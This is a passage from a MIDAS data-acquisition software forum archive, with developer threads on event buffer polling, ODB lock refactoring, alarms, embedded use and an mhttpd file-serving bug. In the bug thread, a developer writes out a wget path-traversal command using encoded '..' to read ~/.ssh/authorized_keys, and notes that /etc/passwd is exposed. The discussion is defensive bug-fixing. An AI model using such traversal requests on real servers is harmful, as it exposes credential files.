aa) because of this, clients connected remotely should always call bm_receive_event() with BM_NO_WAIT.
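
A polling sketch that follows rule (aa) (assuming the classic bm_receive_event() signature; the 1 Mbyte local buffer is an arbitrary choice, it must fit the largest expected event):

<pre>
#include "midas.h"
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

void poll_one_event(INT hbuf)
{
   const INT kMaxSize = 1024 * 1024;   // must fit the largest event
   char *buf = (char *) malloc(kMaxSize);
   INT size = kMaxSize;

   INT status = bm_receive_event(hbuf, buf, &size, BM_NO_WAIT);
   if (status == BM_SUCCESS) {
      EVENT_HEADER *pheader = (EVENT_HEADER *) buf;
      printf("got event id %d, size %d\n", pheader->event_id, (int) pheader->data_size);
   } else if (status == BM_ASYNC_RETURN) {
      // no event available right now, try again after the next cm_yield()
   }
   free(buf);
}
</pre>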

All of the above applies only to clients connected remotely via the mserver.

to be continued,
K.O.
                   Reply  03 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 7, event buffer polling frequencies 
> > > > > In this technical note, I write down the workings of the midas event buffer code
> > > > > we need to understand and write down how the event buffer code works.
> > > > > bm_send_event() does this ...
> > > > rpc_send_event() does this ...
> > > > mserver rpc_server_receive() does this ...
> > bm_read_buffer() does this ...
> > bm_dispatch_event() does this ...
> > - bm_push_event(buffer name) ...
> > - bm_check_buffers() - call bm_push_event() for all open buffers ...
> > - bm_receive_event() ...
> > - bm_receive_event_alloc() ...
> remote client: cm_yield() -> bm_poll_event() -> bm_receive_event() -> bm_dispatch_event()
> remote client: ss_suspend() -> receive MSG_BM -> rpc_client_dispatch() -> bm_poll_event() -> ...
> mserver: cm_dispatch_ipc -> bm_notify_client() -> send MSG_BM

We now understand that cm_yield() polls the data buffers for new events, adding to buffer lock congestion. What is the
polling frequency in different programs:

mlogger, no run: 1000 ms cm_yield() split by firing of cm_watchdog() (average sleep time is 500ms), poll frequency 2 Hz
mlogger, when running at high data rate: most time is spent looping inside bm_check_buffers(), poll frequency is ~1 Hz
mdump: same thing, 1000 ms cm_yield() is split by cm_watchdog(), poll frequency is 2 Hz
odbedit: 100 ms cm_yield(), poll frequency is 10 Hz, normally it polls just the SYSMSG buffer.
mfe.c frontend: 100 ms cm_yield(), but it makes no event requests, so no polling of event buffers
mhttpd: 0 ms (!!!) cm_yield(), period 10 ms (there is a 10 ms ss_suspend() somewhere there), polls SYSMSG at a crazy frequency of 100 Hz.
mserver: 5000 ms cm_yield() no polling for events

hmm... perhaps the logic of cm_yield() should be changed to only poll for new events once per second -
as for rare events we receive them through the "B" messages from the buffer writer, and high rate
events we process in a batch via the read cache and the loop in bm_check_buffers().

Next is to write down the communication between buffer writers and buffer readers.

to be continued,
K.O.
                      Reply  03 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 8, writer and reader communications 
> > > > > > In this technical note, I write down the workings of the midas event buffer code

Event buffer readers and writers need to communicate the following information:

- writer to reader: when new events are written to the buffer, send a message to wake up any readers that have matching requests
- reader to writer: when buffer is full and we are waiting for free space, readers need to send us a message after they free up some space

Writer to reader path:
writer - bm_send_event() -> bm_wake_up_client_locked() -> for all readers with matching requests -> if "read_wait" is set, send "B" message
reader - ... -> bm_read_buffer() -> bm_wait_for_more_events() -> set "read_wait" to TRUE -> ss_suspend(1000, MSG_BM) - wait for "B" message, also poll the 
buffer every 1000 msec -> when new event is received, clear "read_wait".

Reader to writer path:
writer - bm_send_event() -> bm_wait_for_free_space() -> set "write_wait" to the amount of free space requested -> ss_suspend(1000, MSG_BM) - wait for "B" 
message, also poll every 1000 msec -> clear "write_wait" to zero.
reader - ... -> bm_read_buffer() (also via bm_fill_read_cache()) -> bm_wakeup_producers_locked() -> if we are a GET_ALL reader -> if buffer is 50% empty -> 
if write_wait < free_space -> send "B" message.

N.B.1. There is a fly in the ointment for the writer-to-reader path: a function called
bm_mark_read_waiting() is called from several places to set and clear the reader "read_wait" flag.
I think this causes several logic errors: "read_wait" is mistakenly set for buffers where we have
not requested anything; and "read_wait" is forcibly cleared when we are actually waiting
for a "B" message, with "read_wait" cleared, this message will not be sent. But because we  also
poll for new events (nominally every 1000 msec, with cm_watchdog() cutting it down to average 500 msec),
we will not see this fault unless we look carefully for any extra delays between sending and receiving events.

N.B.2. There is a mistake in bm_wakeup_producers(), it should not send "B" messages to clients with zero "write_wait". (fixed in the new code).

and that's all she wrote,
K.O.
                         Reply  10 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 8, writer and reader communications 
> > > > > > > In this technical note, I write down the workings of the midas event buffer code
> Event buffer readers and writers need to communicate following information:
> 
> N.B.1. There is a fly in the ointment for the writer-to-reader path: a function called
> bm_mark_read_waiting() is called from several places to set and clear the reader "read_wait" flag.
> I think this causes several logic errors...

bm_mark_read_waiting() is removed in the new code; it is unnecessary. This uncovered a number of problems
in the writer-to-reader communications, fixed in the new code:

- bm_poll_event() did not poll anything because internal flags were not set right
- reader "read_wait" now means "I am waiting for new data, please send me a notification "B" message".
- writer sends a notification "B" message and clears "read_wait" to stop sending more notifications until the reader asks for more data.
- for remote clients, there is interplay between the 500 ms blank-off in sending MSG_BM notifications from the mserver and the 1000 ms timeout in the loop of bm_poll_event(). Do not 
change one of them without thinking how it will affect the other one and how they interact.

K.O.
Entry  10 Jan 2018, Andreas Suter, Bug Report, mhttpd - custom page - RHEL/Fedora 
Description of the problem (starting with 61be7a1):

When starting a new experiment, creating a fresh ODB and then adding the 
directory '/Custom', mhttpd runs into a problem on RHEL/Fedora, but not on 
Ubuntu and macOS. When trying to open the ODB from within any browser I get 
the following error message in the midas message queue:

[mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
4096 returned -1, errno 21 (Is a directory)

and in the browser I get a popup which tries to save a file called 'root'.

I tracked this down to the following: in mhttpd, interprete() (line 18046) checks 
if a custom page file exists (ss_file_exist) and if yes, tries to 'load' 
it. Now, at this stage the variable dec_path contains '/root'.

Here is what goes wrong: ss_file_exist tries to open the given path, and if a 
valid file descriptor is returned it assumes the file exists. This is not 
perfectly correct since it will also get a valid file descriptor if path is an 
accessible directory!

Now for whatever reason, on RHEL/Fedora '/root' will return a valid file 
descriptor, but not on macOS and Ubuntu. Others I haven't tested. A possible fix 
would be to check explicitly if path is a directory and if yes return 0 in 
ss_file_exist (see attached diff).
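
In essence the check could look like this (a sketch of the idea; the attached diff has the actual change):

<pre>
/* treat an accessible directory as "file does not exist" */
#include &lt;sys/stat.h&gt;

int ss_file_exist(const char *path)
{
   struct stat st;

   if (stat(path, &st) != 0)
      return 0;                /* cannot stat: does not exist */
   if (S_ISDIR(st.st_mode))
      return 0;                /* a directory is not a servable file */
   return 1;
}
</pre>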

Perhaps there is a cleaner way to deal with this issue?! 
    Reply  11 Jan 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> [mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
> 4096 returned -1, errno 21 (Is a directory)

On some linux systems, "/root" exists; it is a directory used as the home directory 
of user "root" (~root is /root; traditional UNIX has ~root as /).

open() of a directory succeeds on some UNIX systems, on some of them,
read() also works, but on other systems one is supposed
to use opendir() and readdir().

MacOS is of course a BSD system (not SysV like Solaris, not Linux), so things
are different yet again. I think MacOS does not have a /root.

In any case, IMO, mhttpd has no business serving the contents of /root,
or serving any files outside of the mhttpd user $HOME directory. (but also
should not serve files from ~user/.ssh, or any other "secret" files, good
luck making a complete, exhaustive list of all secret files that should not be
served).

K.O.


> 
> and in the browser I get a popup which tries to save a file called 'root'.
> 
> I tracked this down to the following: in mhttpd, interprete() (line 18046) checks 
> if a custom page file exists (ss_file_exist) and if yes, tries to 'load' 
> it. Now, at this stage the variable dec_path contains '/root'.
> 
> Here is what goes wrong: ss_file_exist tries to open the given path, and if a 
> valid file descriptor is returned it assumes the file exists. This is not 
> perfectly correct since it will also get a valid file descriptor if path is an 
> accessible directory!
> 
> Now for whatever reason, on RHEL/Fedora '/root' will return a valid file 
> descriptor, but not on macOS and Ubuntu. Others I haven't tested. A possible fix 
> would be to check explicitly if path is a directory and if yes return 0 in 
> ss_file_exist (see attached diff).
> 
> Perhaps there is a cleaner way to deal with this issue?! 
       Reply  12 Jan 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
> In any case, IMO, mhttpd has no business serving the contents of /root,
> or serving any files outside of the mhttpd user $HOME directory. (but also
> should not serve files from ~user/.ssh, or any other "secret" files, good
> luck making a complete, exhaustive list of all secret files that should not be
> served).

I fully agree with Konstantin. mhttpd should only serve files under certain directories. One is the 
midas/resources directory, another is the one defined in the ODB under /Custom/Path. I plan to modify 
mhttpd to only serve these files (and also prevent tricks like putting "../../../" into the URL). This will then 
also fix Andreas' problem.

Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> > [mhttpd,ERROR] [mhttpd.cxx:563:rread,ERROR] Cannot read file '/root', read of 
> > 4096 returned -1, errno 21 (Is a directory)
> 
> On some linux systems, "/root" exists, it is a directory used as the home directory 
> of user "root" (~root is /root; traditional UNIX has ~root as /).
> 

I just got burned by the same problem on MacOS. mhttpd odb editor cannot open ODB "/System" 
because on MacOS there is a subdirectory called "/System".

So the question is why did mhttpd suddenly start serving files from the main URL?

K.O.
    Reply  21 Dec 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
I implemented that fix. Thank you to Andreas. Creating the "Custom" directory from the web now does 
not have that problem any more.

Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> I implemented that fix. Thank you to Andreas. Creating "Custom" directory from the web now does 
> not have that problem any more.

This fix also stops mhttpd from serving the /etc/passwd file.

BTW, "the fix" in mhttpd unconditionally creates /Custom/Path and sets it to the value of $MIDASSYS. This path 
seems to be prepended to all file paths, so this fix also breaks the normal use of /Custom/xxx entries that contain the full 
path name of the file to serve...

Looks like file serving in mhttpd got messed up and needs to be reviewed. I still strongly believe that mhttpd should 
not serve arbitrary files (only serve files explicitly listed in ODB) or, as the next best option, only serve files from 
subdirectories explicitly listed in ODB.

K.O.
          Reply  27 Dec 2018, Stefan Ritt, Bug Report, mhttpd - custom page - RHEL/Fedora 
> BTW, "the fix" in mhttpd unconditionally creates /Custom/Path and sets it to the value of $MIDASSYS. This path 
> seems to be prepended to all file paths, so this fix also breaks the normal use of /Custom/xxx that contain the full 
> path name of the file to serve...

I just set the /Custom/Path to $MIDASSYS to have something non-zero there. This is only a default which should be changed to the directory 
containing the actual custom pages. If it breaks existing code, just set it manually to an empty string; nothing prevents you from doing that.

> Looks like file serving in mhttpd got messed up and needs to be reviewed. I still strongly believe that mhttpd should 
> be serve arbitrary files (only serve files explicitly listed in ODB) or as next best option, only serve files from 
> subdirectories explicitly listed in ODB.

I'm thinking along the same lines, but figured out that this cannot be done easily. If people have access to the ODB, they can put the directory 
/etc/ into the ODB and then read /etc/passwd that way. We would have to explicitly hard-code some directories to exclude, like /etc/, /var/, etc., 
but on macOS that might be different. We could put the list of directories into a physical file, which cannot be edited via the web interface. 

Stefan
             Reply  27 Dec 2018, Konstantin Olchanski, Bug Report, mhttpd - custom page - RHEL/Fedora 
> I still strongly believe that mhttpd should not serve arbitrary files (only serve files explicitly listed in ODB) or as next best option,
> only serve files from subdirectories explicitly listed in ODB.
> 
> If people have access to the ODB, the can put the directory /etc/ into the ODB and again read that way /etc/passwd.
>

I suggest a more practical approach.

The default configuration should be secure (not serve /etc/passwd and .ssh/id_rsa.pub right out of the box). If users change things,
it is their business, we have to trust them to know what they are doing.

Still we should protect them from trivial security mistakes. Here is an example. Right now we set ODB /Custom/Path to $MIDASSYS,
which is often "$HOME/packages/midas" or "$HOME/git/midas". In this case, the following command will steal the ssh
authorized_keys file: "wget http://localhost:8080/%2e%2e/%2e%2e/.ssh/authorized_keys". (this will not work in the google chrome url bar,
as it replaces "%2e%2e" with ".." then normalizes "/.." to "/"). BTW, I do not know all and every way to obfuscate ".." in order
to escape from a file path jail. Maybe I should see what apache httpd people do against escapes from a file path jail.

Most important is to clearly explain which files we serve from which URLs. If we are upfront that we serve all and any files
with file names in the form ("/Custom/Path" + URL), users may have a clue to not set "/Custom/Path" to blank or "/". On our side,
obviously /Custom/Path set to "" should not mean that we serve any and all files with filenames that can be encoded into a URL.

K.O.

P.S. All this only reinforces my opinion that mhttpd should not be exposed directly to the internet (or even worse,
to a university campus network). Safest is to place it behind a password-protected https proxy and hope the password
is not leaked (hello, browser "save password/show password" button!) and is strong enough against
guessing or brute force attack. (hello, password midas/midas!).

K.O.
Entry  05 Dec 2018, Konstantin Olchanski, Info, Partial refactoring of ODB code 
The current ODB code has several structural problems and I think I now figured out how to straighten them out.

Here are the problems:

a) nested (recursive) odb locks
b) no clear separation between read-only access and read-write access
c) no clear separation between odb validation and repair functions
d) cm_msg() is called while holding a database lock

Discussion:

a) odb locks are nested because most functions lock the database, then call other functions that lock the database again. Most locking primitives - SystemV 
semaphores, POSIX semaphores and mutexes - usually do not permit nested (recursive) locking.

For locking the odb shared memory we use a SystemV semaphore with recursion implemented "by hand" in ss_semaphore_wait_for(). This works ok.

For making odb thread-safe, we use POSIX mutexes, and we rely on an optional feature (PTHREAD_MUTEX_RECURSIVE) which seems to work on most OSes, but 
is not required to exist and work by any standard. For example, recursive mutexes do not work in uclinux (linux for machines without an MMU).

I looked at implementing recursive mutexes "by hand", same as we have the recursive semaphores, and realized that it is quite complicated and computationally 
expensive (read: inefficient). (Also I think nested and recursive locks are "not mainstream" and should rather be avoided). As an example you can see the full 
complexity of a nested lock in its recent implementation in ROOT. (good luck finding it).

A solution for this problem is well known. All functions are separated into "unlocked" user-callable functions and "locked" internal functions. Nested locking is 
naturally eliminated.

Call sequences:
db_get_key() -> db_find_key() // odb is locked twice
become
db_get_key() -> db_get_key_locked() -> db_find_key_locked() // odb is locked once

Actual implementation of this scheme turns out to be a very clean and mechanical refactoring (moving the code without changing what it does).

As a try, I refactored db_find_key() and db_get_key() and I like the result. Locking is now obvious - obscure error paths with hidden "unlock before return" are all 
gone. Extra conversions between hDB and pheader are gone.
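
To illustrate the pattern outside of midas, a generic sketch (std::mutex stands in for the odb semaphore; this is not the actual midas code):

<pre>
#include &lt;mutex&gt;
#include &lt;map&gt;
#include &lt;string&gt;

static std::mutex gDbMutex;
static std::map&lt;std::string, int&gt; gDb;

// internal worker: caller must already hold gDbMutex
static bool find_key_locked(const std::string &name, int *value)
{
   auto it = gDb.find(name);
   if (it == gDb.end())
      return false;
   *value = it->second;
   return true;
}

// user-callable wrapper: locks exactly once, calls only _locked workers
bool find_key(const std::string &name, int *value)
{
   std::lock_guard&lt;std::mutex&gt; lock(gDbMutex);
   return find_key_locked(name, value);   // no nested locking
}

// another user-callable function reuses the worker without locking twice
bool get_two_keys(const std::string &a, const std::string &b, int *va, int *vb)
{
   std::lock_guard&lt;std::mutex&gt; lock(gDbMutex);
   return find_key_locked(a, va) && find_key_locked(b, vb);
}
</pre>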

b) in this refactoring, functions that do not (should not) modify odb become easy to identify - the pheader argument is tagged "const".

This simplifies the implementation of "write-protected" odb - instead of ad-hoc db_allow_write_locked() sprinkled everywhere, one can have obvious calls to 
"db_lock_read_only()" and "db_lock_read_write()".

Separation of locks into "read" and "write" locks, in turn, improves locking behaviour - helps against problems like lock starvation - which we did see with MIDAS - 
as "read" locks are much more efficient - all readers can read the data at the same time, locking is only done when somebody need to "write".

c) some db_validate() functions also try to do repair. This cannot work if validation is called from "read-only" functions like db_find_key(). I now think the "repair" 
functions should be separate from "validate" functions. Validate functions should detect problems, repair functions would repair them. The question remains - 
when is a good time to run a full repair. (probably at the time when we connect to the database - this way, simply starting "odbedit" will force a database check and 
repair).

d) calls to cm_msg() while odb is locked have been a problem for a long time. Because cm_msg() itself calls odb and because it also calls event buffer code 
(SYSMSG buffer) which in turn call odb functions, there was trouble with deadlocks between ODB and event buffer semaphores, trouble with recursive use of 
ODB, etc.

Right now we have all this partially papered over by having cm_msg() put messages into a memory buffer that we periodically flush, but I was never super happy 
with that solution. For example, if we crash before the message buffer is flushed, all error messages are lost, they do not go into midas.log, they are not printed on 
the screen, they are not accessible in the core dump.

To resolve this problem, I have all "locked" functions call db_msg() instead of cm_msg(). db_msg() saves the messages in a linked list which is flushed into 
cm_msg() immediately after we unlock odb.

If we crash after generating an error message but before it is flushed to cm_msg(), we can still access it through the linked list inside the core dump. This is an 
improvement over what we have now. Ideally, all messages should be printed to the terminal and saved to midas.log and pushed into SYSMSG, but most of this is 
impractical at a moment when odb is locked - as we already know it leads to deadlocks and other trouble...

Bottom line, I now have a path to improve the odb code and to resolve some of the long standing structural problems.

K.O.
    Reply  11 Dec 2018, Stefan Ritt, Info, Partial refactoring of ODB code 
All makes sense to me. I agree to proceed with the refactoring.

One additional comment: In the 90's when I developed this code, locking was expensive. On a decent computer you could do a couple of thousand lock operations per second before you hit the 100% 
CPU limit. Therefore I tried to reduce the number of lock operations as much as possible. For example, db_find_key() locks the ODB once and then goes through all keys before it unlocks again. If I locked for 
every key and had an ODB with tens of thousands of keys, that would have taken very long in the old days. 

Now the world has changed, we can do almost a million locks a second. So a db_get_record() does not have to obtain a whole directory in one go, but can get each value separately, and if necessary lock 
the ODB on each key access. This would be slower, but only by a negligible amount these days. So in the spirit of making midas more robust, we can even go a step beyond simple refactoring and change the 
locking scheme if it becomes more transparent and stable.

Best,
Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Info, Partial refactoring of ODB code 
> One additional comment: In the 90's when I developed this code, locking was expensive.
> Now the world has changed, we can do almost a million locks a second.

I am not sure this is quite true. The CPU can execute 3000 million operations per second (3GHz CPU, assuming 1 op/Hz),
so 1 lock operation is worth 3000 normal operations. Of course cache misses and branch mispredictions mess up
this simple arithmetic...

But I think cost of mutex lock/unlock can be easily measured. (hmm... now I am curious).
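
A quick way to satisfy this curiosity (a standard-C++ micro-benchmark of an uncontended mutex, nothing midas-specific):

<pre>
#include &lt;chrono&gt;
#include &lt;cstdio&gt;
#include &lt;mutex&gt;

int main()
{
   std::mutex m;
   const int N = 10000000;
   auto t0 = std::chrono::steady_clock::now();
   for (int i = 0; i < N; i++) {
      m.lock();
      m.unlock();
   }
   auto t1 = std::chrono::steady_clock::now();
   double sec = std::chrono::duration&lt;double&gt;(t1 - t0).count();
   printf("%.1f ns per lock/unlock pair\n", 1e9 * sec / N);
   return 0;
}
</pre>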

The bigger question is architectural: nested/recursive locks are definitely a bad thing to do (not just my opinion).

But closer to home, as I implemented the "write protected" ODB, lock/unlock suddenly has to do MMU operations
(map/unmap memory) and this is *very* expensive.

Also as we start doing more multithreading, lock contention is becoming a problem, and the standard solution
is to implement read-locks and write-locks. (everybody holding a read-lock can read ODB at the same time
without waiting).
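
In standard C++ the read-lock/write-lock idea looks like this (std::shared_mutex as a stand-in; the real odb would need a shared-memory primitive):

<pre>
#include &lt;shared_mutex&gt;

static std::shared_mutex gOdbLock;
static int gValue;

int read_value()
{
   std::shared_lock&lt;std::shared_mutex&gt; lock(gOdbLock);  // many readers at once
   return gValue;
}

void write_value(int v)
{
   std::unique_lock&lt;std::shared_mutex&gt; lock(gOdbLock);  // exclusive access
   gValue = v;
}
</pre>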

So, moving towards separate read and write locks and write-protected (and/or read-protected) ODB shared memory
all points towards reworking the ODB locks to remove the need for nested/recursive locks.

I think Stefan and I are in agreement here.

K.O.
          Reply  27 Dec 2018, Stefan Ritt, Info, Partial refactoring of ODB code 
> I am not sure this is quite true. The CPU can execute 3000 million operations per second (3GHz CPU, assuming 1 op/Hz),
> so 1 lock operation is worth 3000 normal operations. Of course cache misses and branch mispredictions mess up
> this simple arithmetic...

You can try that with "t1" in odbedit. This times the number of db_get_data() calls midas can do per second. On my MacBook Pro I get 470'000 
accesses per second.
Entry  24 Sep 2018, Lars Martin, Suggestion, Self-resetting alarm class 
I was planning to use the alarm system to display an information banner when a
certain valve is open, but I would like it to go away again when the valve is
closed.
Is there a way to achieve that? Maybe reset the alarm from an alarm script?
(Seems like a hack...)
Maybe this could be a useful feature, to be able to define an alarm class that
resets itself once the condition is no longer met?
    Reply  24 Sep 2018, Lukas Gerritzen, Suggestion, Self-resetting alarm class 
If you run an external script anyway, you can also call "odbedit -c alarm" to
reset all alarms. Or you could try to set the "Triggered" entry of that certain
alarm to 0 (again, with odbedit), that could also work.
       Reply  25 Sep 2018, Stefan Ritt, Suggestion, Self-resetting alarm class 
> If you run an external script anyway, you can also call "odbedit -c alarm" to
> reset all alarms. Or you could try to set the "Triggered" entry of that certain
> alarm to 0 (again, with odbedit), that could also work.

That would not really help, because you cannot trigger a script AFTER an alarm occurred. Having 
"self-resetting" alarms is actually not a bad idea. I could add a flag "Auto reset" which is false by 
default and can be set to true for this functionality. Will keep that in mind for the next 
development cycle.

Stefan
          Reply  26 Dec 2018, Konstantin Olchanski, Suggestion, Self-resetting alarm class 
> > If you run an external script anyway, you can also call "odbedit -c alarm" to
> > reset all alarms. Or you could try to set the "Triggered" entry of that certain
> > alarm to 0 (again, with odbedit), that could also work.
> 
> That would not really help, because you cannot trigger a script AFTER an alarm occurred. Having 
> "self-resetting" alarms is actually not a bad idea. I could add a flag "Auto reset" which is false by 
> default and can be set to true for this functionality. Will keep that in mind for the next 
> development cycle.
> 

I second, this is a good idea. Sometimes I want "sticky" alarms that stay on to indicate that a bad thing happened in the 
past, sometimes I want self-resetting alarms that go away when a bad thing turns back into a good thing.

When I do this in a frontend, I manually trigger the alarm and manually clear the alarm, e.g. you can see this
done in ~addaq/online/src/fectrl.cxx

Use al_trigger_alarm() and al_reset_alarm().
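
For the valve example, the frontend code could look like this sketch (argument order as in al_trigger_alarm(); AT_INTERNAL is the alarm type I would try here):

<pre>
#include "midas.h"

void check_valve(BOOL valve_open)
{
   if (valve_open)
      al_trigger_alarm("Valve open", "Valve XYZ is open",
                       "Warning", "", AT_INTERNAL);
   else
      al_reset_alarm("Valve open");   // banner goes away when the valve closes
}
</pre>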

This can also be done through the json-rpc interface - both calls are available as rpc commands - and so easy to use 
from javascript. (but there is no simple unix command line tool to issue json-rpc requests. ouch. must write one now.)

K.O.
    Reply  25 Sep 2018, Stefan Ritt, Suggestion, Self-resetting alarm class 
> I was planning to use the alarm system to display an information banner when a
> certain valve is open, but I would like it to go away again when the valve is
> closed.
> Is there a way to achieve that? Maybe reset the alarm from an alarm script?
> (Seems like a hack...)
> Maybe this could be a useful feature, to be able to define an alarm class that
> resets itself once the condition is no longer met?

Actually you can implement such a thing right now pretty quickly using custom javascript on 
the status page. Just read the valve state regularly from the ODB and dynamically modify the 
status page to show or hide a banner. Look at how custom pages work in midas and try to apply 
this to the status page status.html, which you find in the resources directory.
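A minimal sketch of that idea (the ODB path is made up, and it assumes a <div id="valveBanner"> added to status.html):

   // poll the valve state once per second and show/hide the banner
   function updateValveBanner() {
      mjsonrpc_db_get_values(["/Equipment/Cryostat/Variables/ValveOpen"]).then(function(rpc) {
         var open = rpc.result.data[0];
         document.getElementById("valveBanner").style.display = open ? "block" : "none";
      }).catch(function(error) {
         mjsonrpc_error_alert(error);
      });
   }
   setInterval(updateValveBanner, 1000);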

Stefan
Entry  24 Sep 2018, Devin Burke, Forum, Implementing MIDAS on a Satellite 
Hello Everybody,

I am a member of a satellite team with a scientific payload and I am considering
coordinating the payload using MIDAS. This looks to be challenging since MIDAS
would be implemented on a Xilinx Spartan 6 FPGA with minimal hardware
resources. The idea would be to install a soft processor on the Spartan 6 and
run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
anybody have any comments on how feasible this would be or perhaps have
experience implementing a similar system?

-Devin
    Reply  25 Sep 2018, Stefan Ritt, Forum, Implementing MIDAS on a Satellite 
> Hello Everybody,
> 
> I am a member of a satellite team with a scientific payload and I am considering
> coordinating the payload using MIDAS. This looks to be challenging since MIDAS
> would be implemented on an Xilinx Spartan 6 FPGA with minimal hardware
> resources. The idea would be to install a soft processor on the Spartan 6 and
> run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
> anybody have any comments on how feasible this would be or perhaps have
> experience implementing a similar system?
> 
> -Devin

While some people successfully implemented a midas *client* in an FPGA softcore, the full midas 
backend would probably not fit into a Spartan 6. Having done some FPGA programming and 
worked on satellites, I doubt that midas would be well suited for such an environment. It's 
probably overkill. The complete GUI is likely useless, since you want to minimize the 
communication load on the satellite link.

Stefan
       Reply  25 Sep 2018, Devin Burke, Forum, Implementing MIDAS on a Satellite 
> > Hello Everybody,
> > 
> > I am a member of a satellite team with a scientific payload and I am considering
> > coordinating the payload using MIDAS. This looks to be challenging since MIDAS
> > would be implemented on an Xilinx Spartan 6 FPGA with minimal hardware
> > resources. The idea would be to install a soft processor on the Spartan 6 and
> > run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
> > anybody have any comments on how feasible this would be or perhaps have
> > experience implementing a similar system?
> > 
> > -Devin
> 
> While some people successfully implemented a midas *client* in an FPGA softcore, the full midas 
> backend would probably not fit into a Spartan 6. Having done some FPGA programming and 
> working on satellites, I doubt that midas would be well suited for such an environment. It's 
> probably some kind of overkill. The complete GUI is likely useless since you want to minimize your 
> communication load on the satellite link.
> 
> Stefan

Thank you for your comment, Stefan. We do have some hardware resources on the board, such as RAM, ROM and
Flash storage, so we wouldn't necessarily have to virtualize everything. Ideally we would like a
complete, compressed file to be produced on board and regularly sent back to ground without
requiring remote access. MIDAS is appealing to us because it's easily automated, but we wouldn't
necessarily need functions like a GUI or web interface. Part of the discussion now is whether a
MicroBlaze processor would be sufficient or if we need a dedicated ARM processor.

Devin 
          Reply  26 Dec 2018, Konstantin Olchanski, Forum, Implementing MIDAS on a Satellite 
> 
> Thank you for your comment, Stefan. We do have some hardware resources on the board, such as RAM, ROM and
> Flash storage, so we wouldn't necessarily have to virtualize everything. Ideally we would like a
> complete, compressed file to be produced on board and regularly sent back to ground without
> requiring remote access. MIDAS is appealing to us because it's easily automated, but we wouldn't
> necessarily need functions like a GUI or web interface. Part of the discussion now is whether a
> MicroBlaze processor would be sufficient or if we need a dedicated ARM processor.
> 

Hi, just recently I got a midas frontend to build and run on uclinux on a microblaze soft-core CPU (GRIFFIN CDM VME board).

It worked, but uncovered many problems inside midas - uclinux has no mmu, no multithreading, no recursive mutexes, and 
lacks some of the other things midas assumes are always available.

The worst problem I ran into was uclinux giving us a very small stack, so code like "int main() { char buf[10*1024]; ... }" 
crashes right away, and there is a lot of code like this in midas.
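The usual fix is to move such buffers off the stack, along these lines:

   #include <stdlib.h>

   int main()
   {
      /* char buf[10*1024];  -- ~10 kbytes on a tiny uclinux stack: crashes */
      char *buf = malloc(10*1024);   /* heap allocation works fine */
      if (buf == NULL)
         return 1;
      /* ... use buf ... */
      free(buf);
      return 0;
   }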

My feeling about the xilinx soft-core CPU is that if you can run uclinux, you can also run a midas frontend. We do not require 
memory beyond that needed to store one or two of your data events.

By design, the midas library can be built in a "minimal" configuration that only supports a frontend connected
to the mserver (no local ODB, no local event buffers, no local mhttpd/mlogger, etc).
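In practice this means running only the frontend binary on the embedded side and pointing it at a remote mserver, e.g. (host and experiment names are placeholders):

   # on the uclinux board: everything is routed through the mserver on "daqhost"
   ./frontend -h daqhost -e myexperiment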

As you have seen in the Makefile, there are provisions for cross-compilation and I cross-compile midas things quite often.

On the other hand, if you have a xilinx FPGA with a built-in PowerPC CPU, you can most definitely run full linux 
and full midas on it; we have done this for the T2K/ND280 experiment in Japan.

K.O.
Entry  24 Oct 2018, Ryu Sawada, Info, bm_receive_event timeout in ROME 
Hi all

There is a bug report in the ROME repository which says bm_receive_event times out.

https://bitbucket.org/muegamma/rome3/issues/8/rome-with-midas-produces-timeout-after

Does anybody have any ideas what could be causing the problem?

Ryu
    Reply  26 Dec 2018, Konstantin Olchanski, Info, bm_receive_event timeout in ROME 
> There is a bug report in the ROME repository which says bm_receive_event times out.
> https://bitbucket.org/muegamma/rome3/issues/8/rome-with-midas-produces-timeout-after
> Does anybody have any ideas what could be causing the problem?

There could be a problem where bm_receive_event() waits for an event for longer than 
the rpc timeout. This rings a very small bell for me, but I do not remember the details.
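If that is indeed the problem, a client-side workaround is to poll instead of blocking, so that no single rpc call outlives the rpc timeout. A rough sketch, using the ASYNC flag of the midas of that era ("hBuf" is an already-open buffer handle):

   INT  size, status;
   char event[64*1024];   /* big enough for one of your events */

   do {
      size = sizeof(event);
      status = bm_receive_event(hBuf, event, &size, ASYNC);
      if (status == BM_ASYNC_RETURN)
         cm_yield(100);   /* no event yet: service rpc traffic, then retry */
   } while (status == BM_ASYNC_RETURN);
   /* on BM_SUCCESS, one event has been copied into event[] */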

As I now go through the midas event buffer code, I will check that bm_receive_event() connected 
through the mserver has correctly working timeouts.

Thank you for reminding me about this difficulty.

K.O.
Entry  18 Dec 2018, Konstantin Olchanski, Info, mxml update 
the mxml library was updated to make it thread-safe.
https://bitbucket.org/tmidas/mxml/src/master/

I also take this opportunity to remind everyone to update your copy to the latest version,
as I just stumbled on an old bug that I fixed a year ago (a crash of mlogger)
but forgot to propagate to each and every one of my copies of mxml.

I also looked at the xml encoder and I see that it has several places where it may
truncate the data, but none of these places can cause truncation of ODB data
because the fixed-size internal buffers are big enough to hold the longest
values sent by the odb xml encoder.

K.O.
Entry  30 Oct 2018, Joseph McKenna, Bug Report, Side panel auto-expands when history page updates 

One can collapse the side panel when looking at history pages with the button in
the top left - great! We want to see many pages, so screen real estate is important.

The issue we face is that when the page refreshes, the side panel expands. Can
we make the panel state more 'sticky'?

Many thanks
Joseph (ALPHA)

Version: 	2.1
Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
on branch feature/midas-2017-10
